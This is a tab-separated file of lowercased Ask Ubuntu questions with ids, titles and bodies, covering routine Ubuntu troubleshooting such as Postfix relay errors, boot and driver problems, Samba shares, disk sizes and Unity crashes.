468536	postfix 554 5.7.1	i have a cloud instance of ubuntu server 10.04 , kernel ver . 2.6.32-363-ec2 ( 2.6.32-363.77 ) . i am having quite an issue recieving email from other domains . i have been running test email from gmail and my other cloud provider , and every time i get bounced back with a 554 5.7.1 relay access denied message . i have spent a few hours troubleshoting this one , and i am coming up dry . when i installed postfix and dovecot , i used the automated installer from the ubuntu repositories . after the install , i double checked my configuration , just to be sure , and everything looked a-ok . i went ahead and checked the problem i had with the centos 6 image my new cloud provider was offering , smtp access . i was unable , and reluctant , to telnet into port 25 on my server , so i defered to a local solution . i was able to telnet into the instance from the local server and verify access . i proceeded to create a user and maildir , then apply the correct ownership and permissions . the i started testing the service . i have been unable to get past this 554 error at all . i have been scouring google for an answer , using a very wide variety of search terms , but turning up empty . the furthest i have gotten , so far , was finding out that postfix did not install all the necessary packages , which i started correcting . i am now stuck on a package i do not know how to find . here is the output of `` postfix set-permissions '' : chown : can not access `/usr/lib/postfix/dict_sdbm.so ' : no such file or directory does anyone know the name of this package , or the general search terms ? am i on the right track to fixing this and getting up and going ? has anyone had a similar issue ? if this is not correctable , can i get a walkthrough on how to compile , from source , without all this crap , an instance of postfix ? the contents of my main.cf file is as follows : # see /usr/share/postfix/main.cf.dist for a commented , more complete version # debian specific : specifying a file name will cause the first # line of that file to be used as the name . the debian default # is /etc/mailname . # myorigin = /etc/mailname smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) biff = no # appending .domain is the mua 's job . append_dot_mydomain = no # uncomment the next line to generate `` delayed mail '' warnings # delay_warning_time = 4h readme_directory = no # tls parameters smtpd_tls_cert_file = /etc/ssl/certs/ssl-mail.pem smtpd_tls_key_file = /etc/ssl/private/ssl-mail.key smtpd_use_tls = yes smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache # see /usr/share/doc/postfix/tls_readme.gz in the postfix-doc package for # information on enabling ssl in the smtp client . myhostname = anonymous-server.anonymous-domain.anonymous-tld alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases myorigin = /etc/mailname mydestination = anonymous-server.anonymous-domain.anonymous-tld , localhost.anonymous-domain.anonymous-tld , anonymous-server relayhost = mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all home_mailbox = maildir/ smtpd_sasl_auth_enable = yes smtpd_sasl_type = dovecot smtpd_sasl_path = private/dovecot-auth smtpd_sasl_authenticated_header = yes smtpd_sasl_security_options = noanonymous smtpd_sasl_local_domain = $ myhostname broken_sasl_auth_clients = yes smtpd_recipient_restrictions = reject_unknown_sender_domain , reject_unknown_recipient_domain , reject_unauth_pipelining , permit_mynetworks , permit_sasl_authenticated , reject_unauth_destination smtpd_sender_restrictions = reject_unknown_sender_domain mailbox_command = /usr/lib/dovecot/deliver -c /etc/dovecot/conf.d/01-dovecot- postfix.conf -n -m `` $ { extension } '' smtp_use_tls = yes smtpd_tls_received_header = yes smtpd_tls_mandatory_protocols = sslv3 , tlsv1 smtpd_tls_mandatory_ciphers = medium smtpd_tls_auth_only = yes tls_random_source = dev : /dev/urandom # smtpd_relay_restrictions = permit_mynetworks , permit_sasl_authenticated , defer_unauth_destination smtpd_relay_restrictions = thankies for your time !
468539	where are the colors for the system theme ( or just the gnome-terminal ) specified in ubuntu 14.04 ?	i really like the default color scheme for gnome-terminal in ubuntu 14.04 . i want to use it for my terminal color scheme in xubuntu . the only problem is that i have not been able to find the configuration for the default color scheme in ubuntu 's gnome-terminal . is there a file in ubuntu somewhere that specifies each color ? the best i could find was while checking the colors tab while editing the default profile . it has checked `` use colors from system theme . '' where are those specified ?
468542	ubuntu uefi boot problem on ssd	i recently tried to replace windows with ubuntu 14.04 on an ssd . somehow after installation i could not boot into the system . it said : error 1962 - no operating system found - please press any key to repeat boot sequence since my machine ( a lenovo thinkcenter k410 ) uses uefi , i used a efi boot partition for efi bootloaders , used the ssd for the system , and the original hdd as the data drive . what 's weird is that it does n't boot right after installation , but it boots after i use boot-repair to fix it . but when it restarts , it fails to boot and gives me the error code as above . i did somehow run into a post regarding this problem and it indicated it was a lenovo bug . error code 1962 - no operating system found - lenovo community but here is my boot-repair log : ubuntu pastebin it said : = > grub2 ( v1.99-2.00 ) is installed in the mbr of /dev/sdb and looks at sector 17672192 of the same hard drive for core.img , but core.img can not be found at this location . so is that the problem instead of the lenovo bug ? if so , how should i fix this ? thanks !
468543	ca n't open ubuntu	i 've installed the following version of ubuntu om my machine : ubuntu-12.04-desktop-i386.iso but when i switch on the computer , i get the command line . ubuntu 12.04 lts ubuntu tty6 once i provide my username and password , it authenticates and then displays a link to documentation . now , how can i start a gui ? am i stuck at the command line ?
468545	how can i increase the size of a linux partition from an unloccated	i have windows 8 and ubuntu on my laptop . i created a partition too small for linux at the begining . i wanted to increase it with 20go from my windows partition . i remove it from windows and it is now `` unlocated '' . how could i join my linux partition with this new free space ?
468548	kubuntu 14.04 - network manager shows only 3 vpn op	this appears to be a new issue as i do not see records of it having startpage-d this particular issue . i recently installed kubuntu 14.04 on a new machine . i did not observe the same problem with the network-manager in ubuntu 12.04 or debian 7.5/gnome , thus believe this pertains to kubuntu/kde specifically . the network manager only shows a maximum of 3 `` available '' vpn connections under my wireless connection , whereas i have imported a couple of dozen . they are accessible and configured if i click `` edit '' but that does not allow me to connect any of the ones that are not displayed by clicking on the network manager in the gui . unless someone has a fix , this may be a bug that needs to be reported to kubuntu , kde , or the maintainers of the network-manager . i will ask first and then make the report as required . updated : placing he mouse over the corner of the box allows resizing . not at the bottom . was then able to resize . scrolling still appears not to work , which is maybe not an optimal design , but it works !
468549	live usb ubuntu install	so i am currently using a persistent usb and every time i boot it asks me if i wan na try ubuntu or install . should i just keep trying or should i click install and then install onto my usb ? i am currently just using the try now and i 'm wondering if i should install it on my usb
468552	install hangs after `` starting cups printing spooler/server ''	laptop 's a clevo d900f/sager 9280 . successfully installed an older version of ubuntu a couple years ago , no hardware changes since then . want more info let me know . burnt the `` ubuntu-14.04-desktop-amd64.iso '' to a dvd-r. restarted the laptop , booted from the dvd , welcome page appeared , then the splash-screen with the white/red dots appeared , went to a black screen , then back to the splash-screen , then to a gray screen with a white bar at the top , then to a black screen and remained `` hung '' for 10 minutes or so until i pressed the power button and was instructed to eject the cd and press any key . retried the install but this time i pressed a key at the welcome page and selected english from the advanced welcome page , then selected the option to check the disk . it checked out fine so i retried the install again . pressed f4 which showed me a list of tasks it was doing . everything passed except for ... starting restore sound card state [ fail ] but when it got to ... starting cups printing spooler/server [ ok ] it just `` hung '' there again for another 10 minutes . i could press the f1-5 buttons to go through the different consoles , type in commands , etc . but i could n't get back to the splash-screen and i do n't know any other keyboard shortcuts or boot options which would show more information . any ideas on how i can get this to work would be much appreciated , thanks in advance .
468553	unable to run javac though java is working	i am getting the error message below when i run javac on ubuntu terminal : the program 'javac ' can be found in the following packages : * default-jdk * ecj * gcj-4.6-jdk * gcj-4.7-jdk * openjdk-7-jdk * openjdk-6-jdk try : sudo apt-get install < selected package > while java -version is working . how to resolve this ?
468556	unable to access windows files running ubuntu from a usb drive	my 8.1 stuffed up ! it does n't load windows and instead keeps saying windows is repairing the problem and will restart . it keeps on restarting time and time again . so i 've mounted the latest version of ubuntu onto a usb drive . changed my computers settings to disable fast boot and made the usb drive a priority when booting . i did this in the menu by pressing f2 when i start the computer . i can not change it in the power options in windows because i ca n't open it . i press try ubuntu and when i go into the computer i ca n't open the hard drives it shows there because of the following message . i tried following instructions given here but still can not access the drives . http : //www.howtogeek.com/howto/windows-vista/use-ubuntu-live-cd-to-backup-files-from-your-dead-windows-computer/ http : //imageshack.com/a/img841/9659/dqhgu.jpg please help as i wish to save some of my files onto an external usb before sending the computer back to the manufacturer where it will most likely be formatted . regards
468562	will tunnel bear ever be supported on ubuntu ?	i have used tons of vpns , and i really do n't like any except tunnelbear . i need something that i can set my location with . if there is a good alternative that is available with ubuntu please let me know because i have not found one even for windows . so , will ubuntu ever support tunnelbear ? it would be really nice if they would do this soon .
468566	can i install ubuntu 14.04 32-bit on an older desktop with 1gb ram ?	when i attempt the install , my mouse freezes as soon as i select the install option . i can get through the process using the keyboard , but , the system hangs at `` configuring boot loader ... '' . any suggestions ? thanks , h
468567	what is wrong with the memory usage ?	i ca n't figure out what is consuming my memory ... could anyone help me ? user @ desktop : ~ $ free total used free shared buffers cached mem : 8176992 6186776 1990216 0 43532 5052076 -/+ buffers/cache : 1091168 7085824 swap : 0 top , sorted by memory ( shift+f + n + enter ) top - 02:28:40 up 5:01 , 2 users , load average : 0.18 , 0.66 , 1.00 tasks : 192 total , 1 running , 191 sleeping , 0 stopped , 0 zombie cpu ( s ) : 1.0 % us , 0.7 % sy , 0.0 % ni , 98.2 % id , 0.0 % wa , 0.0 % hi , 0.1 % si , 0.0 % st mem : 8176992k total , 6218404k used , 1958588k free , 43612k buffers swap : 0k total , 0k used , 0k free , 5061260k cached pid user pr ni virt res shr s % cpu % mem time+ command 2181 user 20 0 1246m 229m 55m s 0 2.9 11:42.13 compiz 7274 user 20 0 2809m 103m 57m s 0 1.3 0:12.46 chromium-browse 7370 user 20 0 689m 103m 66m s 0 1.3 0:09.88 chromium-browse 7389 user 20 0 1196m 101m 39m s 0 1.3 0:17.20 chromium-browse 2298 user 20 0 2164m 71m 17m s 0 0.9 0:26.33 dropbox 1460 root 20 0 165m 69m 26m s 1 0.9 16:39.59 xorg 2452 user 20 0 1290m 58m 35m s 0 0.7 0:01.21 knotify4 1161 mysql 20 0 481m 56m 7156 s 0 0.7 0:07.74 mysqld 2198 user 20 0 1361m 51m 20m s 0 0.7 1:51.84 nautilus 2254 user 20 0 704m 39m 28m s 1 0.5 0:13.04 yakuake 2340 user 20 0 534m 36m 10m s 0 0.5 0:40.98 unity-panel-ser 7323 user 20 0 1115m 33m 18m s 0 0.4 0:00.32 chromium-browse 7282 user 20 0 328m 32m 25m s 0 0.4 0:00.15 chromium-browse 2424 user 20 0 600m 21m 16m s 0 0.3 0:00.62 kglobalaccel 2310 user 20 0 577m 21m 15m s 0 0.3 0:00.96 kded4 there are more lines ( on the top output ) , but i simply can not believe they sum up to the huge amount of memory taken by the system . 6gb are being used , and less than 2gb are free .
468571	understanding some ubuntu shell commands	for a computer science work i need to understand how a script that was given to me works . however there are some commands that i have no idea what they do and ive tried googling them but had no luck.. im really new to linux shell scripting so sorry if this is too basic . any link for linux scripting is welcome ! 1 ) so what does [ -z string ] do ? for example this appears in the script : [ -z `` $ ( which ssh ) '' ] also is $ ( which ssh ) a string or a variable ? 2 ) what does ~/.filename means ? i know that ./filename is used to execute files sometimes and that ./ its a pointer to the directory itself.. but what is the ~/ . ? what does [ -e filename ] do ? eg : ~/.cache 3 ) what does [ ! -d ~/.ssh ] do ? thanks in advantage
468573	14.04 amd64 splash stuck ! exec format error help	hello！this is my first try getting into ubuntu，i used drivedroid to install ubuntu 14.04 amd64，and it stucks at splash screen . i 'm using dualcore cpu with nvidia graphic card，also 8gb ram and 64gb ssd . i think it 's all because of partition settings，since it keeps showing exec format error after i disabled quiet splash something . wish i could upload the image but it seems hard to do so because im now writing this via my ipad . any help？thanks in advance！
468576	personal package archive ( ppa ) export	i plan to upgrade a machine from 12.04 to 14.04 lts . i explore the best way to export the personal package archive ( ppa ) repository list and import it back after the migration ? does backing-up /etc/apt/sources.list and restoring source.list with the same permission is an acceptable practice ?
468579	samba shares not consistently visible	i am running ubuntu 12.04 on my laptop for 2 years now . i have 2 nas systems in my network , which i usually can see in nautilus as samba shares . but the last few days i have troubles reaching them , while i have n't changed anything on my network or my laptop ! it seems like my network is 'unstable ' : sometimes i see both of my nases , while a few minutes later i only see one of them or none at all . the only samba share i always see , is my own laptop . i tried sudo restart smbd sudo restart nmbd smbtree with smbtree i sometimes get another result then with nautilus . this is the usual result from smbtree : alfons @ alfons-laptop : ~ $ smbtree enter alfons 's password : workgroup \\px-eh px-eh \\px-eh\lp \\px-eh\admin $ ipc service ( px-eh ) \\px-eh\ipc $ ipc service ( px-eh ) \\px-eh\fotocopier backup for the photos \\px-eh\disk lan disk \\diskstation \\diskstation\ipc $ ipc service ( ) \\diskstation\video system default shared folder \\diskstation\public diskstation 212 \\diskstation\music system default shared folder \\diskstation\fotos \\diskstation\home home \\alfons-laptop alfons-laptop server ( samba , ubuntu ) \\alfons-laptop\hl3150cdw hl3150cdw \\alfons-laptop\ipc $ ipc service ( alfons-laptop server ( samba , ubuntu ) ) \\alfons-laptop\print $ printer drivers why do my samba shares sometimes look unstable ? and what can i try to solve this ?
468580	removing windows 7 after ubuntu installation	i intend to install ubuntu 14.04 into my toshiba c855d laptop , windows7 , with a dual boot option . i want ubuntu to sit side by side with windows7 , not within it . then , at a later date , when i am skilled with ubuntu , i want to totally remove the windows7 os and allow ubuntu to occupy my entire hard drive . is this possible ? i know that during the ubuntu installation , i am given the option to remove windows7 . but i want to do that at a later date . i will be using the downloaded installation disc i made from the ubuntu.com website . thanks for your patience for this newcomer .
468585	connecting my laptop with my phone via bluetooth in ftp mode	i am not able to play or transfer any media file in my laptop when connected to my moto g phone in ftp mode using bluetooth.my os is ubuntu 14.04.what is the solution ?
468587	two xubuntu 14.04 machines can not connect samba share	i have two xubuntu 14.04 machines on a lan . i want to create a samba share between them , but i am completely unable to do so . i have tried following command line instructions and editing my smb.conf file , but to no avail . i have tried using shares-admin , but although it creates a share folder that i can see , i can not log in to that folder , no matter what i do . it asks for a password , even though i have not set up a password . why does it do that ? edit : it there an easy way to share files that works ?
468589	ati raedon 3800 hd graphics card	this is my first time using ubuntu from windows and i have just installed ubuntu 14.04 , which i think is excellent . the only problem is my ati radeon 3800 hd graphics card that i can not get installed . i have tried everything i can think off for instance i have downloaded the driver from the amd website and when i tried to install it amd says i do n't have any supported drivers . after restarting my computer the screen then goes into big mode and i ca n't change it back to the original screen setting . i even tried using the terminal , but this does not even appear/open . i have to keep putting in the recovery disc and change back to vga mode . i just wonder if ubuntu does not support this graphics card at all . i have also tried updating the additional drivers . edit : did n't know they where worse than amd . im really stuck when i downgrade . please see the output below : sudo aticonfig -- initial -f sudo : aticonfig : command not found john @ john-thinkcentre-xxxx : ~ $ sudo dpkg -i fglrx*.deb dpkg : warning : downgrading fglrx from 2:13.350.1-0ubuntu2 to 2:12.104-0ubuntu1 ( reading database ... 179503 files and directories currently installed . ) preparing to unpack fglrx_12.104-0ubuntu1_i386.deb ... removing all dkms modules done . unpacking fglrx ( 2:12.104-0ubuntu1 ) over ( 2:13.350.1-0ubuntu2 ) ... dpkg : warning : downgrading fglrx-amdcccle from 2:13.350.1-0ubuntu2 to 2:12.104-0ubuntu1 preparing to unpack fglrx-amdcccle_12.104-0ubuntu1_i386.deb ... unpacking fglrx-amdcccle ( 2:12.104-0ubuntu1 ) over ( 2:13.350.1-0ubuntu2 ) ... dpkg : warning : downgrading fglrx-dev from 2:13.350.1-0ubuntu2 to 2:12.104-0ubuntu1 preparing to unpack fglrx-dev_12.104-0ubuntu1_i386.deb ... unpacking fglrx-dev ( 2:12.104-0ubuntu1 ) over ( 2:13.350.1-0ubuntu2 ) ... setting up fglrx ( 2:12.104-0ubuntu1 ) ... loading new fglrx-12.104 dkms files ... building only for 3.13.0-24-generic building for architecture i686 building initial module for 3.13.0-24-generic error ! bad return status for module build on kernel : 3.13.0-24-generic ( i686 ) consult /var/lib/dkms/fglrx/12.104/build/make.log for more information.update-initramfs : deferring update ( trigger activated ) processing triggers for ureadahead ( 0.100.0-16 ) ... processing triggers for bamfdaemon ( 0.5.1+14.04.20140409-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... setting up fglrx-amdcccle ( 2:12.104-0ubuntu1 ) ... setting up fglrx-dev ( 2:12.104-0ubuntu1 ) ... processing triggers for initramfs-tools ( 0.103ubuntu4.1 ) ... update-initramfs : generating /boot/initrd.img-3.13.0-24-generic processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... john @ john-thinkcentre-xxxx : ~ $ sudo aticonfig -- initial -f sudo : aticonfig : command not found
468591	no install desktop environments appearing on the login screen	i tried installing gnome an cinnamon through the terminal but when i log out none of the new installed environments appear on the login screen . what do i do ? gnome was installed like this sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update sudo apt-get install gnome-shell and cinnamon sudo add-apt-repository ppa : gwendal-lebihan-dev/cinnamon-stable sudo apt-get update sudo apt-get install cinnamon
468594	copying modules to another system	i configured and made a custom kernel from vanilla kernel downloaded from kernel.org . now i ported it to another machine with simple 'vmlinuz ' and 'initrd.img ' copying and some grub config done . ( actually i am using xen so grub config were also not required for me ) now for the modules , how can i copy that ? can i copy /lib/modules/ ( mycustomekernelversion ) to other system plainly ? regarding xen , ubuntu official documentation for xen-create-image shows -- modules option pointing to modules directory . is it the same directory as the one mentioned above ? note that i am using vanilla kernel and not distribution kernel . this is required , please no question on that .
468595	accessing from another system with the same user	i have 2 linux on the same pc , one is ubuntu and the other is crunchbang . i set the same value as user and password for both . now i am on cranchbang partition and can access to to ubuntu partition home.. why i can delete file on my home in ubuntu ... .. one can delete someone else files only because they have the same value of user ? regards
468598	connect to mobile broadband using dongle	so i bought this vodafone dongle k4201 i. however whenever i connect it to my laptop on ubuntu 12.10 it does n't show any internet to connect to . i tried using the option 'create vpn connection ' but the first window where its supposed to recognise the device is greyed out . i guess the drivers are n't installed on ubuntu for the dongle . so i copied the installation files given on the dongle and uploaded it here : https : //drive.google.com/folderview ? id=0b-lestcmhnfyvtz3zxzfmvhhnta & usp=sharing can anyone tell me how to install it properly on ubuntu 12.10 ?
468600	'enable/disable upnp ' tick box in skype is'nt there	on ubuntu i have installed skype . i wa n't to get the upnp tick box to appear so that i can disable it on skype . i think that upnp might be causing my skype some problems if it 's on . how do i disable upnp on skype ?
468603	ati driver installation	i am using ubuntu 14.04 , kindly assist how to install drivers for my ati radeon graphics card [ mobility radeon hd 5650/5750 / 6530m/6550m ] . i read some documentation on the given site but i am not sure if i really need to do all this . http : //www.securethelock.com/2014/04/20/installing-configuring-amdati-drivers-ubuntu-14-04-trusty-tahr/
468604	ca n't upgrade ubuntu the system	the upgrade needs a total of 27.4 m free space on disk '/boot ' . please free at least an additional 9,027 k of disk space on '/boot ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' . how to get free space for installing new updates ? i checked the boot in the file system . there were different versions of the same thing . can i just delete older versions by myself to get free space ?
468606	how to change default python version from terminal ?	i 'm using ubuntu 14.04 where the default python version is 2.7 . i would love to type python3 to run python 3.4 . how can i set that ? ( after that , i think i can run python 2.7 by typing python2 ) .
468609	audio decoder ( mp3 ) is not present	i have installed ubuntu13.10 . my sound card is not having any problem as start up sound was very clear . bt when i played songs and movies an error occurred giving that mp3 decoder is not present . so which type of driver or software do i need install now .
468610	shell specific theme	i am running ubuntu 13.10 with ubuntu-unity and gnome 3 installed on it , due to the way the gnome adwait theme looks in unity i do n't want to have to manually change the theme every time i switch between gnome ( adwait ) to unity ( ambience ) is there a way of making the themes different depending on which shell i am in ? also can the same be done about the icon theme ?
468612	ubuntu 14.04 lts - volume control keys	i 've used ubuntu 14.04 lts for 3 weeks . my laptop 's ( samsung rv510 ) function keys did work for volume changing until now . yesterday they suddenly did n't work anymore when i turned on my computer . i still can use my fn keys to change brightness of monitor for example . if i open system settings - > keyboard - > shortcuts - > sound and media : then volume down is set to `` audiolowervolume '' and volume up to `` audioraisevolume '' . these values are same , if i press my fn key + buttons i want to control the volume , but still ca n't change the volume with them . but if i bind f9 and f10 for example , then it works , then i can use these button to control the volume . if i bind fn+f9 and fn+f10 then it does n't work . it means , something is up with my fn keys . tried to google , did n't find answer to my problem . hope you can help me !
468616	gnome-panel and starter missing	i use ubuntu 14.04 lts with standard window manager compiz . now , after starting up and logging in normally , on the desktop there 's no gnome panel and no starter , just the desktop . when i double-click on an icon on the desktop , e. g. some .pdf evince starts quite normally , but also the top bar is n't there . also i ca n't start gnome-terminal with ctrl-alt-t . i deleted .compiz , using ctrl-alt-f1 , trying to reset compiz , but it did n't work . i can start up any program with display=:0.0 ( program ) but that 's not really a solution . i also installed ccsm to check if the unity-plugin was enabled . it was n't , but after enabling nothing changed . right now i 'm logged in as guest , where everything is normal . any ideas ? i think the difference is , that the error is only on one user . and the suggested solutions do n't work
468619	bootloader missing	i have tried installing ubuntu in my sony vaio ( sve15137cn ) laptop running windows 8. even though ubuntu has been successfully installed bootloader for ubuntu does not appear when booting the device.. kindly help me out ... thanks in advance .
468620	wifi not working on asus u32 with ubuntu 14.04	i know this problem has been stated before , but none of the solution worked for me . i 'm running ubuntu 14.04 on a asus u32 laptop , alongside windows 8 . recently i 've updated from 12.04 to 14.04 and the wifi ca n't be enable now . before upgrading , it worked perfectly . i have no hardware button to switch it on/off , so it must be software related . on windows 8 the wifi is working ok . i 've tried fn+f2 to enable it , but it also goes on for about 1 second . also , i 've tried the rfkill unblock command in terminal , but nothing . i do n't know what else should i try .
468623	configuration dual nic for internet and client pxe	dual nic edubuntu ibm i have installed edubuntu on ibm server x series with two nic.in my setup the eth0 is connected to switch and eth1 is connected to my belkin router with other windows pc . client booting is fine with above setup but internet access to other windows pc and wifi devices get disconnected.i have been working on this for last two weeks to sort out the issue but can't.many resources on internet seems to be similar but without amy solution . what i want is to have net access to all my windows pc as well as edubuntu clients with same router and switch.i have tried modifying network interfaces , ltsp configuration and so on but endup with fresh installation.what if eth1 can be configured to my router ip ? i am setting up computer lab in my school where each pc can pxe boot edubuntu from ibm server and and normal boot from from local hard disk . i am running edubuntu 12.04. kindly suggest any link or help resources ... . regards
468624	why does usb power go off ?	when i boot ubuntu from dvd , the mouse and keyboard work up to the point where i must choose to try or install ubuntu . the keyboard and mouse still have power while loading or installing . but when the os is completely loaded the keyboard powers off and the mouse stops working . and that is it . i can not do anything . can someone tell me why that happens ? can i somehow fix it ?
468625	gnu grub shows instead of ubuntu	i am trying to reboot my computer , but i am getting gnu grub instead . i not installed dual boot , i have only ubuntu on this computer . also the keyboard is not working there , so i can not make any selection . i am using usb one . and it 's working if i go the bios before i am going to gnu grub . any ideas why i am getting gnu grub out of sudden ? how to get start getting into ubuntu back again ? thanks for help .
468626	recording both software audio and microphone input using glc	i a trying to record games ( minecraft to be specific ) using glc . the video works perfectly however records no audio how do i record both what i hear through my headphones and what i say through my microphone i 'm running ubuntu 12.04 .
468627	black screen with every linux install !	i have two computers . a desktop and a laptop . i am able to run and install ubuntu , debian , fedora , mint and other linuxes on the desktop . but on the laptop i just get black screen after clicking `` install '' / '' graphice install '' /other options that i have . some information about the labtop . nvidia gt 630 intel i7 and a 1366x768 screen i think . i really hope somebody can help me . i have red a ton of posts both here on askubuntu and on other websites and none of them seems to help me !
468628	ubuntu 14.04 wo n't install on boot ssd	i 'm trying to install ubuntu on my laptop but it does n't detect the boot ssd . i have an alienware m14x . i exchanged the hdd for a 120gb ssd and then replaced the disk drive with the original 750 hdd for storage . it has windows 7 home premium 64-bit installed on the ssd boot drive but when i boot up from usb with ubuntu it says i have no os installed and will only show the 750gb hdd . when i click try ubuntu it does however show the ssd drive on the desktop . i have installed on the 750 hdd but then it will only boot to ubuntu and no options are present to boot to windows . i have taken the hdd out and it just says you have two hdd 's installed . so now i 'm stuck . any help very much appreciated . thanks in advance .
468629	how do i view the man pages ?	i 'm new to linux . i got the `` unix and linux system administration handbook '' it speaks of several verisons of linux and unix , and the commands for viewing linux man pages and not specific to ubuntu . how do i view the manpages ?
468632	nut ( ups ) and ssl certificates	today i installed nut on my ubuntu server ( ubuntu 14.04 lts ) . $ uname -a linux boson 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:30:00 utc 2014 x86_64 x86_64 x86_64 gnu/linux the ups is connected to another server ( called neutron ) , so i use nut-client to keep tabs on the ups state . when i do sudo upsc ups @ neutron.local i get : init ssl without certificate database battery.charge : 15 battery.charge.low : 10 battery.charge.warning : 50 battery.date : not set battery.mfr.date : 2012/11/27 : the first line of the output concerns me . i 've not seen this on other installations of nut on debian-based servers . what can i do to get rid of that line ? edit : this `` init ssl without certificate database '' is extra annoying because it is not part of the output of upsc and therefore i can not grep it out . edit ( 2 ) : to clarify , the ( synology ) server ( which talks directly to the ups ) is not set-up with ssl or certificates . other ( debian/raspbian ) clients on the network do not have the above issue . no ssl certificates are installed ( as far as i can find out ) . find / |grep cert_db on either the server or the clients yields no results .
468634	ca n't install amd graphics drivers	i just switched from my old backtrack 5 installation to a kubuntu installation . sadly , i ca n't install the amd graphic drivers . on my bt5 installation everything went fine , but my kubuntu installation is missing something to install them . here is my log : check if system has the tools required for installation . fglrx installation requires that the system have kernel headers . /lib/modules/3.13.0-24-generic/build/include/linux/version.h can not be found on this system . fglrx installation requires that the system has gcc tool . gcc can not be found on this system . one or more tools required for installation can not be found on the system . install the required tools before installing the fglrx driver . optionally , run the installer with -- force option to install without the tools . forcing install will disable amd hardware acceleration and may make your system unstable . not recommended . i installed the gcc thing via sudo apt-get install gcc . this went fine , but i do n't know where to obtain the other stuff . could anyone help me with this problem ? also , i 've downloaded these drivers from the amd homepage for my 4xxx graphic card . then i 've extracted it to receive the *.run file and opened this one by typing sudo ./ati-xxx.run .
468636	i have problem ! my monitor says out of range when i boot in ubuntu	when i turn on my computer , and boot in ubuntu it starts to load , but few secunds later my monitor shuts down , and says : ''out of range '' .please help me resolve this problem .
468639	how i can download pdfs of a website by using only the root domain name ?	i am using this command : wget -nd -e robots=off -- wait 0.25 -r -a.pdf http : //yourwebsite.net/ but i ca n't get pdfs from the website . for example i have a root domain name : www.example.com and this site have pdfs , docs , htmls , etc . i want to download all pdfs by inserting only the root domain name , not the exact address of the download page .
468646	df showing different disk sizes in 14.04 and 12.04 ?	i have several servers on rackspace and have been moving some of them over from 12.04 to 14.04 . one of the features they have is called block storage which lets you attach an external disk . these can be reattached to any server and are not dependent on which os you are using . in ubuntu 12.04 i had created a 150gb partition and df shows that it is 150gb . but i created the same in 14.04 , copied the files over , but df says it is only 141gb . upon noticing this i realized that my other disks are similarly smaller than they should be ( e.g . a 100gb partition is only 94gb ) . i 'm completely aware that 5 % or so of disk space is reserved automatically by the os . this is n't that even though it seems every google result regarding df and missing space seems to be this . i played with this number just to confirm and only the available percentage changed . has df changed in the past two years or am i missing something ? output in 12.04 ( df ) /dev/xvdb1 150g 95g 48g 67 % /external ( fdisk ) disk /dev/xvdb : 161.1 gb , 161061273600 bytes 65 heads , 3 sectors/track , 1613193 cylinders , total 314572800 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x26e02677 device boot start end blocks id system /dev/xvdb1 2048 314572799 157285376 83 linux output in 14.04 ( df ) /dev/xvdc1 141g 93g 41g 70 % /external2 ( fdisk ) disk /dev/xvdc : 161.1 gb , 161061273600 bytes 65 heads , 3 sectors/track , 1613193 cylinders , total 314572800 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x4a1274d9 device boot start end blocks id system /dev/xvdc1 2048 314572799 157285376 83 linux
468647	authentication error downloading softwares from software center	when ever i try to install some software from the software centre . it says authentication error software ca n't be installed or removed because the authentication service is not available . ( org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.160 ' } ) : org.debian.apt.install-or-remove-packages and after i click okay you are not allowed to perform this action you do n't have the required privileges to perform this action . but everything seems to work fine when i use the terminal to install software . i 'm using ubuntu 14.04 in the lenovo z510 ideapad . help is appreciated .
468649	while partition recover using testdisk , deepsearch is taking long time ?	i have 500gb harddisk which had 2 partition . i accidentally deleted the partitions while installing ubuntu . now i have just one partition i since computer show 492gb space and ubuntu is installed in that partition . i tried recovering using testdisk and having hard time figuring out the non-gui interface . quick search did n't seem to find the partition i lost so i tried deepsearch . what do i need to do after deepsearch should i wait for anlyse cylinder to complete 100 % or should i stop after sometime , then what i need to do after that . i am quite new to ubuntu
468655	help creating a partition for 14.04 next to xp for dual boot	i was installing 14.04 and the only options i got were replace xp completely or something else . i choose something else . partitions come up . problem is i ca n't figure out how to create a new partition for 14.04 from here . i want to keep xp and install 14.04 as a dual boot option . any help would be appreciated . thanks
468656	unity crash in ubuntu 14.04	after logging in to my account , i see no panels or anything else , only the background . i can not even start a terminal with ctrl+alt+t . the only thing the system responds to is ctrl+alt+delete which shows the system monitor ( without the top panel ) or ctrl+alt+f1 to login by hand . however logging in to the guest session works fine . when logging in by hand i can not restart unity ( unity -- replace ) , this gives me : unknown job : unity-panel-service without the graphics display open i can not reset compiz and unity to default settings . searching other questions i tried to move the .xauthority in ~/ to some other place . did not work . i also tried the sudo apt-get install -- reinstall ubuntu-desktop and sudo apt-get install -- reinstall unity +rebooting . also tried to reinstall lightdm . nothing works . i 've been running on ubuntu 14.04 lts just fine for quite some time and have n't recently done any changes besides installing updates .
468658	firefox-like global menu integration	i 'm using ubuntu 14.04 . the original firefox integrate with unity perfectly . i want to use palemoon , but unfortunately , it has no integration with unity/global menu . i tried to look at the default plugin/add-ons on firefox , but the `` unity integration '' add-on description is just for web apps and not global menu . i even tried downloading vanilla firefox from mozilla site , but it does n't integrate either with unity , even with the same add-ons . i saw this question , but it seems palemoon nor vanilla firefox does n't have ui.use_unity_menubar . so i 'm wondering where can i see the code for that . is canonical hardcode it into firefox source ? is there a way to see it ?
